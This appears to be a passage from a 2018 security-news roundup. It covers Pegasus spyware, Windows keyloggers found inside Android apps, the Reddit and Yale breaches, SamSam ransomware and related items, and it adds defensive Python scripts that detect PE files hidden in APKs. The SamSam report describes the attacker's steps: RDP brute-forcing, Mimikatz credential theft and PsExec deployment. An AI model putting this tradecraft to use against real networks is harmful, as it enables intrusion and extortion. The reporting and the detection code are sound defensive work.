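SAMPLE_RECORDS = [
    ("placeholder-one[.]test",   "2017-03-12T08:30:00Z"),   # Sunday 10:30 local
    ("placeholder-two[.]test",   "2017-03-13T12:00:00Z"),   # Monday 14:00 local
    ("placeholder-three[.]test", "2017-03-15T07:15:00Z"),   # Wednesday 09:15 local
    ("placeholder-four[.]test",  "2017-03-16T15:45:00Z"),   # Thursday 17:45 local
    ("placeholder-five[.]test",  "2017-03-18T10:00:00Z"),   # Saturday: weekend
    ("placeholder-six[.]test",   "2017-03-14T21:00:00Z"),   # Tuesday 23:00: after hours
]

if __name__ == "__main__":
    print(registration_pattern(SAMPLE_RECORDS))
```

A high share on its own proves little, since many time zones overlap a working day, which is why the report pairs this signal with infrastructure overlaps rather than relying on it alone.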

Several companies develop surveillance platforms for targeting mobile devices. The NSO Group operated in the dark for several years, until researchers from Citizen Lab and the Lookout firm spotted its software in targeted attacks against the UAE human rights defender Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who had reported on corruption in the Mexican government.

NSO replied that its surveillance solution was “intended to be used exclusively for the investigation and prevention of crime and terrorism.”

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially, the sale of surveillance software is limited to authorized governments, to support agencies’ investigations of criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

The traces collected by Amnesty International were corroborated by the findings of an investigation conducted by researchers at the internet watchdog Citizen Lab.

“Amnesty International shared the suspicious messages with us and asked us to verify their findings, as we have been tracking infrastructure that appears to be related to NSO Group’s Pegasus spyware since March 2016.” reads the analysis published by Citizen Lab.

“Based on our analysis of the messages sent to these individuals, we can corroborate Amnesty’s findings that the SMS messages contain domain names pointing to websites that appear to be part of NSO Group’s Pegasus infrastructure.”

Citizen Lab has collected evidence of attacks against 175 targets worldwide carried out with the NSO spyware, including other attacks against individuals in Qatar or Saudi Arabia, where the Israeli surveillance software is becoming very popular.

Country nexus  | Reported cases of individuals targeted | Year(s) in which spyware infection was attempted
Panama         | Up to 150 (Source: Univision)          | 2012-2014
UAE            | 1 (Source: Citizen Lab)                | 2016
Mexico         | 22 (Source: Citizen Lab)               | 2016
Saudi Arabia   | 2 (Source: Amnesty, Citizen Lab)       | 2018
The Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, the recent discovery demonstrates that the trade in surveillance software is getting out of control.

“This is a huge market that’s completely opaque and under-regulated,” he concluded.


Hundreds of apps removed from Google Play store because they were carrying Windows malware
2.8.2018 securityweek Android

Google recently removed 145 applications from the official Google Play store because they were found to carry malicious Windows executables inside.
Researchers from Palo Alto Networks revealed that Google removed more than 145 apps from the Play store because they were carrying Windows malware.

The apps were uploaded to the Google Play store between October and November 2017, which means that for months Android users were exposed to the attack. In some cases, the apps had been downloaded thousands of times and were rated 4 stars.

The malicious code included in the apps was developed to compromise Windows systems, using the Android apps as an attack vector.

“Notably, the infected APK files do not pose any threat to Android devices, as these embedded Windows executable binaries can only run on Windows systems: they are inert and ineffective on the Android platform.” reads the analysis published by Palo Alto Networks.

“The fact that these APK files are infected indicates that the developers are creating the software on compromised Windows systems that are infected with malware. This type of infection is a threat to the software supply chain, as compromising software developers has proven to be an effective tactic for wide scale attacks.”

Palo Alto Networks reported that the malicious PE files when executed on a Windows system will perform these suspicious activities:

Creates executable and hidden files in Windows system folders, including copies of itself
Modifies the Windows registry so that it auto-starts after a reboot
Attempts to sleep for a long period
Has suspicious network connection activity to IP address 87.98.185.184 via port 8829
Some of the apps included multiple malicious PE files at different locations and with different file names; nevertheless, the experts noticed that the same malware was found embedded in most of the applications.

The researchers discovered that one piece of malware was included in 142 APKs and a second malicious file in 21 APKs; 15 apps contained both PE files.

In one case, the malicious PE file that was included in the APK of most of the Android apps was a keylogger.

“After investigating all those malicious PE files, we found that there is one PE file which infects most of the Android apps, and the malicious activity of that PE file is key logging.” continues the analysis.

“On a Windows system, this key logger attempts to log keystrokes, which can include sensitive information like credit card numbers, social security numbers and passwords.”


The attackers attempted to conceal the PE files by using legitimate-looking names, such as Android.exe, my music.exe, COPY_DOKKEP.exe, js.exe, gallery.exe, images.exe, msn.exe and css.exe.
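Because an APK is a ZIP archive and Android simply ignores members it does not understand, a Windows executable can ride inside it under any name. A pre-publication check therefore has to look at content rather than file names: an MZ DOS header whose `e_lfanew` field points at the `PE\0\0` signature. The following is an added example, not Palo Alto Networks code. The APK it scans is a constructed stand-in built in memory, and the embedded "PE files" are minimal header stubs, not runnable programs.

```python
"""Find Windows PE executables hidden inside an APK, whatever their file name.

Added example, not Palo Alto Networks code. The APK built below is a
constructed stand-in (a ZIP with fake manifest, dex and asset entries);
the embedded 'PE files' are minimal headers, not runnable programs.
"""
import io
import struct
import zipfile

def looks_like_pe(data: bytes) -> bool:
    """True if data starts with an MZ DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def scan_apk_for_pe(apk) -> list:
    """Return [(entry_name, size)] for every ZIP member carrying a PE header.

    The check reads content, so an innocent-looking path hiding a PE is
    flagged while a text file merely named like an .exe is not.
    """
    hits = []
    with zipfile.ZipFile(apk) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(4096)          # both headers sit at the start
            if looks_like_pe(head):
                hits.append((info.filename, info.file_size))
    return sorted(hits)

def fake_pe(payload_len: int) -> bytes:
    """Minimal MZ header + e_lfanew + 'PE\\0\\0' stub, padded with zeros."""
    hdr = b"MZ" + bytes(58) + struct.pack("<I", 0x40) + b"PE\0\0"
    return hdr + bytes(payload_len)

def build_sample_apk() -> bytes:
    """Constructed APK-like archive with two hidden PE stubs and one decoy."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00" + bytes(28))
        zf.writestr("classes.dex", b"dex\n035\0" + bytes(64))
        zf.writestr("assets/Android.exe", fake_pe(200))      # PE under a plausible name
        zf.writestr("res/raw/data.bin", fake_pe(120))        # PE under an innocent name
        zf.writestr("assets/gallery.exe", b"just a text file named like an exe")
    return buf.getvalue()

def scan_sample() -> list:
    """Build the constructed APK in memory and scan it."""
    return scan_apk_for_pe(io.BytesIO(build_sample_apk()))

if __name__ == "__main__":
    print(scan_sample())
```

Run against a real build, the scan belongs in the CI step that produces the release APK: a clean developer workstation is the first line of defense the quoted analysis asks for, and a content check on the artifact is the cheap second one.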

The researchers discovered that not all the apps uploaded by the same developers were infected with the malicious files, likely because they were built on different development platforms.

“The malicious PE files cannot directly run on the Android hosts. However, if the APK file is unpacked on a Windows machine and the PE files are accidentally executed, or the developers also issue Windows-based software, or if the developers are infected with malicious files runnable on Android platforms, the situation will go much worse.” concludes Palo Alto Networks.

“The development environment is a critical part of the software development life cycle. We should always try to secure it first. Otherwise other security countermeasures could just be attempts in vain.”


Facebook reported and blocked attempts to influence the campaign ahead of the US midterm elections
2.8.2018 securityweek Social

Facebook removed 32 Facebook and Instagram accounts and pages that were involved in a coordinated operation aimed at influencing the midterm US elections.
Facebook has removed 32 Facebook and Instagram accounts and pages that were involved in a coordinated operation aimed at influencing the forthcoming midterm US elections.


Facebook is shutting down content and accounts “engaged in coordinated inauthentic behavior”

At this time there is no evidence confirming the involvement of Russia, but intelligence experts suspect that Russian APT groups were behind the operation.

Facebook founder Mark Zuckerberg announced his response to the recently disclosed abuses.

“One of my top priorities for 2018 is to prevent misuse of Facebook,” Zuckerberg said on his own Facebook page.

“We build services to bring people closer together and I want to ensure we’re doing everything we can to prevent anyone from misusing them to drive us apart.”

According to Facebook, “some of the activity is consistent” with the Tactics, Techniques and Procedures (TTPs) associated with the Internet Research Agency, the Russian troll farm behind the misinformation campaign aimed at the 2016 presidential election.

“But we don’t believe the evidence is strong enough at this time to make public attribution to the IRA,” Facebook chief security officer Alex Stamos told reporters.

Facebook revealed that some 290,000 users followed at least one of the blocked pages.

“Resisters” enlisted support from real followers for an August protest in Washington against the far-right “Unite the Right” group.

According to Facebook, the fake pages were created more than a year ago; in some cases they were used to promote real-world events, two of which have already taken place.

Just after the announcement, the US Government remarked it will not tolerate any interference from foreign states.

“The president has made it clear that his administration will not tolerate foreign interference into our electoral process from any nation-state or other malicious actors,” deputy press secretary Hogan Gidley told reporters.

The investigation is still ongoing, but the social media giant decided to disclose early findings to shut down the orchestrated misinformation campaign.

Nathaniel Gleicher, Head of Cybersecurity Policy at Facebook, explained that the threat actors used VPNs and internet phone services to protect their anonymity.

“In total, more than 290,000 accounts followed at least one of these Pages, the earliest of which was created in March 2017. The latest was created in May 2018.
The most followed Facebook Pages were “Aztlan Warriors,” “Black Elevation,” “Mindful Being,” and “Resisters.” The remaining Pages had between zero and ten followers, and the Instagram accounts had zero followers.
There were more than 9,500 organic posts created by these accounts on Facebook and one piece of content on Instagram.
They ran about 150 ads for approximately $11,000 on Facebook and Instagram, paid for in US and Canadian dollars. The first ad was created in April 2017, and the last was created in June 2018.
The Pages created about 30 events since May 2017. About half had fewer than 100 accounts interested in attending. The largest had approximately 4,700 accounts interested in attending, and 1,400 users said that they would attend.” said Gleicher.
Facebook announced it would start notifying users who followed the blocked pages and users who said they would attend events created by one of the suspended accounts and pages.

Facebook reported its findings to US law enforcement agencies, Congress, and other tech companies.

“Today’s disclosure is further evidence that the Kremlin continues to exploit platforms like Facebook to sow division and spread disinformation, and I am glad that Facebook is taking some steps to pinpoint and address this activity,” declared the Senate Intelligence Committee’s top Democrat Mark Warner.


Ten years ago someone breached a Yale University server
2.8.2018 securityweek Incident

Ten years ago someone breached a Yale University server, but because the intrusion happened nearly ten years ago, little information is available about how it occurred.
After ten years, Yale University revealed a security breach that exposed an archive containing personal information of 119,000 people.

Hackers breached the systems of the famous university between April 2008 and January 2009, apparently accessing a server hosting a single database.

“On July 26th and 27th, Yale mailed notices to members of the Yale community, including alumni/ae, faculty members, and staff members, who were affected by a data intrusion that occurred in 2008-2009.” reads the security alert published by the Yale University.


The database contained data on individuals affiliated with the university; the unauthorized access was discovered on June 16, 2018, during a security review.

The hackers accessed names, Social Security numbers, dates of birth, Yale email addresses, and in some cases the physical addresses of individuals associated with the university.

Unfortunately, there is no way to determine how the attackers hacked the server, and “it is not feasible to determine the identities of the perpetrators.”

The academic institution announced that no financial information was exposed, and it sent notification letters to 97% of the affected people in the Yale community.

Unfortunately, there is more disconcerting news for the Yale community: a letter sent by the university to the New Hampshire Attorney General revealed that the same server was hacked a second time between March 2016 and June 2018.

This second intrusion caused the exposure of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale is offering identity monitoring services to all affected U.S. residents through the Kroll security firm. At the time there is no indication that the exposed data has been misused.


Reddit discloses a data breach, a hacker accessed user data
2.8.2018 securityweek Incident

Reddit Warns Users of Data Breach
Reddit is warning its users of a security breach, an attacker broke into the systems of the platform and accessed user data.
Reddit is warning its users of a security breach, a hacker broke into the systems of the platform and accessed user data.

The hacker accessed user data, email addresses, and a 2007 backup database containing hashed passwords managed by the platform.

The data breach was discovered on June 19, 2018. According to Reddit, between June 14 and 18, 2018, the attacker compromised some employee accounts with the company’s cloud and source code hosting providers.

“A hacker broke into a few of Reddit’s systems and managed to access some user data, including some current email addresses and a 2007 database backup containing old salted and hashed passwords. Since then we’ve been conducting a painstaking investigation to figure out just what was accessed, and to improve our systems and processes to prevent this from happening again.” reads a data breach notification published by the company.

Reddit users who still use the same password they had in 2007 should change it now, along with the password of any other service where they reuse the same login credentials.

The hacker did not gain write access to Reddit systems containing backup data, source code, and other logs.

The company explained that the compromised accounts were protected with SMS-based two-factor authentication, a circumstance that suggests the attackers were able to intercept the authentication codes sent via SMS.

“Already having our primary access points for code and infrastructure behind strong authentication requiring two factor authentication (2FA), we learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept. We point this out to encourage everyone here to move to token-based 2FA.” continues Reddit.


The company has taken steps to lock down and rotate all production secrets and API keys, and to enhance its monitoring systems.

Reddit has already reported the security breach to law enforcement and is notifying affected users, urging them to change their passwords.

Let me close with this Q&A published by Reddit:

What information was involved?

Since June 19, we’ve been working with cloud and source code hosting providers to get the best possible understanding of what data the attacker accessed. We want you to know about two key areas of user data that was accessed:

All Reddit data from 2007 and before including account credentials and email addresses
What was accessed: A complete copy of an old database backup containing very early Reddit user data — from the site’s launch in 2005 through May 2007. In Reddit’s first years it had many fewer features, so the most significant data contained in this backup are account credentials (username + salted hashed passwords), email addresses, and all content (mostly public, but also private messages) from way back then.
How to tell if your information was included: We are sending a message to affected users and resetting passwords on accounts where the credentials might still be valid. If you signed up for Reddit after 2007, you’re clear here. Check your PMs and/or email inbox: we will be notifying you soon if you’ve been affected.
Email digests sent by Reddit in June 2018
What was accessed: Logs containing the email digests we sent between June 3 and June 17, 2018. The logs contain the digest emails themselves — they look like this. The digests connect a username to the associated email address and contain suggested posts from select popular and safe-for-work subreddits you subscribe to.
How to tell if your information was included: If you don’t have an email address associated with your account or your “email digests” user preference was unchecked during that period, you’re not affected. Otherwise, search your email inbox for emails from [noreply@redditmail.com](mailto:noreply@redditmail.com) between June 3-17, 2018.


Facebook Uncovers Political Influence Campaign Ahead of Midterms
1.8.2018 securityweek Social

Facebook said Tuesday it shut down 32 fake pages and accounts involved in an apparent "coordinated" effort to stoke hot-button issues ahead of November midterm US elections, but could not identify the source although Russia is suspected of involvement.

It said the "bad actor" accounts on the world's biggest social network and its photo-sharing site Instagram could not be tied directly to Russian actors, who American officials say used the platform to spread disinformation ahead of the 2016 US presidential election.

The US intelligence community has concluded that Russia sought to sway the vote in Donald Trump's favor, and Facebook was a primary tool in that effort, using targeted ads to escalate political tensions and push divisive online content.

With the 2018 mid-terms barely three months away, Facebook founder Mark Zuckerberg announced his company's crackdown.

"One of my top priorities for 2018 is to prevent misuse of Facebook," Zuckerberg said on his own Facebook page.

"We build services to bring people closer together and I want to ensure we're doing everything we can to prevent anyone from misusing them to drive us apart."

Trump, now president, has repeatedly downplayed Kremlin efforts to interfere in US democracy.

Two weeks ago, he caused an international firestorm when he stood alongside Russian President Vladimir Putin and cast doubt on assertions that Russia tried to sabotage the vote.

But after Facebook's announcement, the White House stressed Trump opposed all efforts at election interference.

"The president has made it clear that his administration will not tolerate foreign interference into our electoral process from any nation state or other malicious actors," deputy press secretary Hogan Gidley told reporters.

Facebook said "some of the activity is consistent" with that of the Saint Petersburg-based Internet Research Agency -- the Russian troll farm that managed many false Facebook accounts used to influence the 2016 vote.

"But we don't believe the evidence is strong enough at this time to make public attribution to the IRA," Facebook chief security officer Alex Stamos said during a conference call with reporters.

Special Counsel Robert Mueller is heading a sprawling investigation into possible collusion with Russia by Trump's campaign to tip the vote toward the real estate tycoon.

Mueller has indicted the Russian group and 12 Russian hackers connected to the organization.

Facebook said it is shutting down 32 pages and accounts "engaged in coordinated inauthentic behavior," even though it may never be known for certain who was behind the operation.

The tech giant's investigation is at an early stage, but was revealed now because one of the pages being covertly operated was orchestrating a counter-protest to a white nationalism rally in Washington.

The coordinators of a deadly white-supremacist event in Charlottesville last year reportedly have been given a permit to hold a rally near the White House on August 12, the anniversary of the 2017 gathering.

Facebook said it will notify members of the social network who expressed interest in attending the counter-protest.

- US 'not doing' enough -

Facebook has briefed US law enforcement agencies, Congress and other tech companies about its findings.

"Today's disclosure is further evidence that the Kremlin continues to exploit platforms like Facebook to sow division and spread disinformation, and I am glad that Facebook is taking some steps to pinpoint and address this activity," said the Senate Intelligence Committee's top Democrat Mark Warner.

The panel's chairman, Republican Senator Richard Burr, said he was glad to see Facebook take a "much-needed step toward limiting the use of their platform by foreign influence campaigns."

"The goal of these operations is to sow discord, distrust and division," he added. "The Russians want a weak America."

US lawmakers have introduced multiple bills aimed at boosting election security.

While top Senate Democrat Chuck Schumer applauded Facebook's action, he said the Trump administration itself "is not doing close to enough" to protect elections.

Some of the most-followed pages that were shut down included "Resisters" and "Aztlan Warriors."

Facebook said some 290,000 users followed at least one of the pages.

"Resisters" enlisted support from real followers for an August protest in Washington against the far-right "Unite the Right" group.

Inauthentic pages dating back more than a year organized an array of real world events, all but two of which have taken place, according to Facebook.

The news comes just days after Facebook suffered the worst single-day evaporation of market value for any company, after missing revenue forecasts for the second quarter and offering soft growth projections.

Zuckerberg's firm says the slowdown will come in part due to its new approach to privacy and security, which helped experts uncover these so-called "bad actors."


Mimecast Acquires Threat Detection Startup Solebit for $88 Million
1.8.2018 securityweek   IT

Email and data security firm Mimecast (NASDAQ: MIME) announced on Tuesday that it has acquired threat detection firm Solebit for approximately $88 million net of cash acquired.

Founded in 2014 by cybersecurity experts from the Israel Defense Forces (IDF), Solebit announced that it had raised $11 million in Series A funding in March 2018.

Solebit’s technology helps detect and protect against zero-day malware and unknown threats in data files and links to external resources/URLs.

“Security methods like signature-based antivirus and sandbox detonation are too limited when it comes to today’s most advanced threats,” said Peter Bauer, chief executive officer at Mimecast.

“Solebit has developed a differentiated approach that is engineered to preclude the need for signatures and sandboxes,” the company explains. “It is designed to help customers find advanced threats by recognizing when there is malicious code embedded within active content and data files.”

Mimecast says that Solebit’s threat detection tools are already integrated into Mimecast Targeted Threat Protection products.

London, UK-based Mimecast announced earlier this month that it had acquired Bethesda, Md.-based security training company Ataata.

“Combined with the recent acquisition of Ataata in the security awareness and training space, and the recently previewed early adopter web security program, Solebit brings another important set of microservices to the Mime|OS platform that all of Mimecast’s unified services are built upon,” the company says.

Research by Mimecast and Vanson Bourne in May 2018 highlighted the extent to which humans are the targeted weakness in cybersecurity. From a pool of 800 IT decision makers and C-level executives, 94% had witnessed untargeted phishing attacks, 92% had witnessed spear-phishing attacks, 87% had witnessed financially-based email impersonation attacks (BEC), and 40% had seen an increase in trusted third-party impersonation attacks.

Founded by Bauer and CTO Neil Murray in 2003, Mimecast went public in late 2015 at $10 per share, raising $78 million in gross proceeds. After the IPO, share value fell as low as $6.20 in January 2016. Since July 2016, however, share price has risen steadily, sitting at $36.37 at the time of writing.

Investors in Solebit include ClearSky Security, MassMutual Ventures and Glilot Capital Partners.


HP Launches Bug Bounty Program for Printers
1.8.2018 securityweek Vulnerability

HP announced on Tuesday the launch of a bug bounty program for printers. The company is prepared to pay out up to $10,000 for serious vulnerabilities found in its products.

The initiative, which HP calls the industry’s first printer bug bounty program, was launched in partnership with crowdsourced security platform Bugcrowd.

The program is private, which means not everyone can participate. Researchers invited by HP have been instructed to focus on firmware-level vulnerabilities, including remote code execution, cross-site request forgery (CSRF) and cross-site scripting (XSS) bugs.

The rewards range between $500 and $10,000 per flaw, but HP is not disclosing the specific payouts for each type of issue. Researchers can also earn a reward if they report a vulnerability previously discovered by HP itself – the company describes this as a “good faith payment.”

The bug bounty program currently covers HP LaserJet Enterprise printers and MFPs (A3 and A4), as well as the HP PageWide Enterprise printers and MFPs (A3 and A4).

HP told SecurityWeek that currently it’s engaged with 34 researchers. The company says the program covers only endpoint devices – printer-related web domains are out of scope – with a focus on print firmware.

The company plans on expanding the program to its PC line soon, but it currently focuses on printers due to concerns that the technological advancements in this area make these types of devices an attractive target for malicious actors. HP noted that printers can not only provide access to the network that houses them, but they can also expose confidential documents.

“As we navigate an increasingly complex world of cyber threats, it’s paramount that industry leaders leverage every resource possible to deliver trusted, resilient security from the firmware up,” said Shivaun Albright, HP's Chief Technologist of Print Security. “HP is committed to engineering the most secure printers in the world.”


SamSam Ransomware: Patient, Persistent, Competent and Dangerous
1.8.2018 securityweek Ransomware

The SamSam ransomware has always been a bit different. Unlike many ransomware infections, its victims are targeted rather than random -- and the attacker establishes a presence on the victim network before beginning the encryption process.

Victims this year include the City of Atlanta, Allscripts, Adams Memorial Hospital, Colorado Department of Transportation and the Mississippi Valley State University. It could seem that SamSam targets health, education and government; but a new and detailed analysis of SamSam from Sophos shows this is not the case -- and its success rate is far higher than previously thought.

"Sophos have discovered that these three sectors account for fewer than half of the total number of organizations we believe have been victims of SamSam, and it's the private sector who have suffered the most (and disclosed the least)."

By following the money and tracking the Bitcoin payment wallets with help from Neutrino (a firm that specializes in tracking cryptocurrency flows), Sophos researchers have estimated that the SamSam attacker has netted more than $5.9 million since version 1 (it is now at version 3) began being used in January 2016. The attacker is currently collecting an average of $300,000 per month. Sophos estimates that about 233 victims have paid a SamSam ransom.

The attacker is thought to be a single person working alone rather than a criminal or nation-state gang. He (or she) is proficient, although not perfect, in the English language, but probably comes from a country where English is not the first language. He does not boast about his exploits and has no known social media presence where linguistic tells, like those within his ransomware, might provide clues to his identity. At this point, his identity and nationality are unknown.

Sophos researchers have tracked (PDF) the evolution of SamSam through its three versions. It shows a developer getting ever more proficient in his craft. The basic MO is to select the targets, possibly through publicly available search engines such as Shodan or Censys, to access the network, to elevate privilege and reconnoiter, and then to encrypt everything he can access. The encryption itself is usually done overnight to reduce the chance of detection.

According to the researchers, version 3 usually gains entry by brute-forcing Windows RDP accounts. "While some may find this shocking," say the researchers, "a simple search on Shodan will reveal thousands of IP addresses accessible over port 3389, the default RDP port."

Once access to a domain user account is obtained, the attacker will typically use Mimikatz to harvest the credentials of the first domain admin to log on. This has been known on some occasions to take days, with the attacker simply waiting.

Armed with privileged access, the attacker starts to manually deploy the ransomware. First, he takes control of one of the victim's servers, which he uses as his command center. Then, he scans the network. If he can write a tiny text file to a computer's filesystem (called test.txt), the name of that file is added to a separate file stored on his command server and known as 'alive.txt'. "The attacker later uses this .txt file as a target list," report the researchers.

Deployment from the command server is usually done with the Sysinternals PsExec application, although the attacker has been known to switch to PowerAdmin's PaExec if the former is blocked. Once the attack is initiated, the attacker simply waits for payment.

One key element of SamSam is the extent to which stealth is used, completely in keeping with and supporting the attacker's low-profile approach to crime. "In version 3 of SamSam," say the researchers, "the general operation of the payload hasn't changed much since version 1, but the attackers have put significant efforts into creating a stealthier version of the malware."

One example of this is the order in which targeted files are encrypted -- anything smaller than 100 Mb immediately, and larger files in size order. SQL and MDF files (which are typically large and time-consuming to encrypt) are next; and finally, anything left that is not on an exclusion list. "This carefully curated approach enables the attacker to achieve a greater volume of encrypted files before the attack is spotted and interrupted."

Another example is the consistency with which the attacker deletes the files he uses once the device is encrypted, or if the attack is interrupted.

Payment is made in Bitcoin (BTC), and the attacker offers several initial options. Individual computers can be decrypted on payment of 0.8 BTC (as of July 2018). Full decryption -- regardless of the number of encrypted computers -- costs 7 BTC (around $40,000 at July 2018 exchange rates). Victims have 7 days to make payment; but there is at least one example of the victim being offered the option to reopen the countdown on payment of 0.5 BTC.

The bad news for victims is that there is no known way to recover SamSam encrypted files. The good news, if you can call it such, is that the attacker really does provide decryption, and even offers online support for those who have difficulties.

Sophos urges companies not to pay any ransom, but accepts the difficulties with SamSam. "Instead," say the researchers, "Sophos strongly recommends a comprehensive layered approach to security, to both avoid an initial attack, and enable system recovery through backups." However, they also note, "Securing an environment against a competent, persistent, and patient, human adversary is somewhat different from defending against the more conventional kinds of semi-automated, social engineering-driven threats more commonly seen in enterprise environments. And SamSam's own particularly damaging behavior sets it apart from many other ransomwares."


Mozilla Reinforces Commitment to Distrust Symantec Certificates
1.8.2018 securityweek Security 

Mozilla this week reaffirmed its commitment to distrust all Symantec certificates starting in late October 2018, when Firefox 63 is set to be released to the stable channel.

The browser maker had decided to remove trust in TLS/SSL certificates issued by the Certification Authority (CA) run by Symantec after a series of problems emerged regarding the wrongful issuance of such certificates.

Despite being one of the oldest and largest CAs, Symantec sold its certificate business to DigiCert after Internet companies, including Google and Mozilla, revealed plans to gradually remove trust in said certificates; those plans remained in place even after DigiCert said it won’t repeat the same mistakes as Symantec.

The first step Mozilla took was to warn site owners about Symantec certificates issued before June 1, 2016, and encourage them to replace their TLS certificates.

Starting with Firefox 60, users see a warning when the browser encounters websites using certificates issued before June 1, 2016 that chain up to a Symantec root certificate.

According to Mozilla, less than 0.15% of websites were impacted by this change when Firefox 60 arrived in May. Most site owners were receptive and replaced their old certificates.

“The next phase of the consensus plan is to distrust any TLS certificate that chains up to a Symantec root, regardless of when it was issued […]. This change is scheduled for Firefox 63,” Mozilla’s Wayne Thayer notes in a blog post.

That browser release is currently planned for October 23, 2018 (it will arrive in Beta on September 5).

At the moment, around 3.5% of the top 1 million websites are still using Symantec certificates that will be impacted by the change. While the number is high, it represents a 20% improvement over the past two months, and Mozilla is confident that site owners will take action in due time.

“We strongly encourage website operators to replace any remaining Symantec TLS certificates immediately to avoid impacting their users as these certificates become distrusted in Firefox Nightly and Beta over the next few months,” Thayer concludes.

Google too is on track to distrust all Symantec certificates on October 23, 2018, when Chrome 70 is expected to land in the stable channel. Released in April, Chrome 66 has already removed trust in certificates issued by Symantec's legacy PKI before June 1, 2016.


DHS Unveils National Risk Management Center
1.8.2018 securityweek   BigBrothers

Kirstjen Nielsen introduces National Risk Management Center

Secretary of Homeland Security Kirstjen Nielsen said on Tuesday that the U.S. Department of Homeland Security (DHS) has launched the National Risk Management Center, a joint center housed within DHS that will enable the private sector and government to collaborate and devise solutions to reduce risk to critical infrastructure.

Announced at the DHS National Cybersecurity Summit today in New York City, the new center will focus on three things:

● Identify, assess, and prioritize efforts to reduce risks to national critical functions, which enable national and economic security;

● Collaborate on the development of risk management strategies and approaches to manage risks to national functions; and

● Coordinate integrated cross-sector risk management activities.

According to the DHS, the center will lead a series of activities that will help “define what is truly critical; create the frameworks by which government and industry collectively manage risk; and initiate specific cross-sector activities to address known threats.”

Notable attendees and participants at the Summit include Vice President Mike Pence, Secretary of Energy Rick Perry, FBI Director Christopher Wray, and General Paul M. Nakasone, Commander of U.S. Cyber Command and Director of the National Security Agency.

A live stream of the event can be watched online throughout the day.


Android Apps Carrying Windows Malware Yanked From Google Play
1.8.2018 securityweek   Android

Google recently removed 145 applications from Google Play after they were found to carry malicious Windows executables inside, Palo Alto Networks reveals.

Most of the infected applications, Palo Alto's researchers say, were uploaded to the application store between October and November 2017 and remained there for over half a year. Google removed all of them after being alerted to the issue.

While not representing a threat to the Android users who downloaded and installed them, the malicious code within these APKs is proof of the dangers posed by supply chain attacks: the software developers built these applications on compromised Windows systems.

Some of the infected Android applications had over 1000 downloads and 4-star ratings before being removed from Google Play.

The security researchers discovered that some of the infected APKs contained multiple malicious PE files at different locations, with different names. However, two malicious files were found embedded in most applications.

One of the files was present in 142 APKs, while the second had infected 21 APKs. The security firm also found 15 apps with both PE files inside, as well as some APKs with a number of other malicious PE files inside.

The researchers also note that one malicious PE file that infected most of the Android apps was a keylogger. The malicious program attempted to log keystrokes, including sensitive information like credit card numbers, social security numbers and passwords.

To appear legitimate, these files use fake names, including Android.exe, my music.exe, COPY_DOKKEP.exe, js.exe, gallery.exe, images.exe, msn.exe and css.exe.

When executed on Windows systems, the malicious PE files would create executable and hidden files in Windows system folders, including copies of themselves, would modify the Windows registry to auto-start after a system restart, would attempt to sleep for long periods of time, and also showed suspicious network connection activity to IP address 87.98.185.184 via port 8829.

“Interestingly, we saw a mixture of infected and non-infected apps from the same developers. We believe the reason might be that developers used different development environment for different apps,” Palo Alto Networks says.

The malicious PE files cannot directly run on Android devices, but if the APK is unpacked on a Windows machine and the malicious code is executed, that system becomes infected. As Palo Alto Networks points out, the situation could become much worse if the developers were infected with malicious files that can run on Android.
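A content-based check for this kind of contamination, added here as an example and not part of the Palo Alto Networks report or its tooling: it walks the APK (a zip archive) and flags any entry whose leading bytes form a DOS/PE header, whatever the entry is named. The APK and the PE header stub inside it are constructed inline for the demonstration.

```python
import io
import struct
import zipfile

PE_SIGNATURE = b"PE\x00\x00"


def looks_like_pe(data: bytes) -> bool:
    """True if `data` begins with a DOS header whose e_lfanew field points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # A short slice (e_lfanew beyond the buffer) simply fails the comparison
    return data[e_lfanew:e_lfanew + 4] == PE_SIGNATURE


def find_embedded_pe(apk_bytes: bytes, probe: int = 4096) -> list:
    """Return the names of zip entries in the APK whose first bytes look like a PE file.

    Only the first `probe` bytes of each entry are read; real PE headers place
    e_lfanew well inside that range, so the check stays cheap on large assets.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(probe)
            if looks_like_pe(head):
                hits.append(info.filename)
    return hits


def _fake_pe_stub() -> bytes:
    """Constructed DOS header + PE signature: a header only, not an executable."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)  # e_lfanew -> offset 0x40
    return bytes(hdr) + PE_SIGNATURE + b"\x4c\x01" + b"\x00" * 30  # machine = i386


def build_sample_apk() -> bytes:
    """Constructed APK-like zip: ordinary Android entries plus one embedded PE header."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest/>")
        zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 64)
        zf.writestr("assets/images/Android.exe", _fake_pe_stub())
        zf.writestr("assets/css.exe", b"body { color: red }")  # .exe name, no PE header
        zf.writestr("res/raw/notes.txt", b"MZ" + b"x" * 100)  # "MZ" text, bogus e_lfanew
    return buf.getvalue()


if __name__ == "__main__":
    for name in find_embedded_pe(build_sample_apk()):
        print("embedded PE file:", name)
```

The name-based entries (css.exe) and the stray "MZ" text are deliberately not flagged; only the entry with a consistent DOS header and PE signature is.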

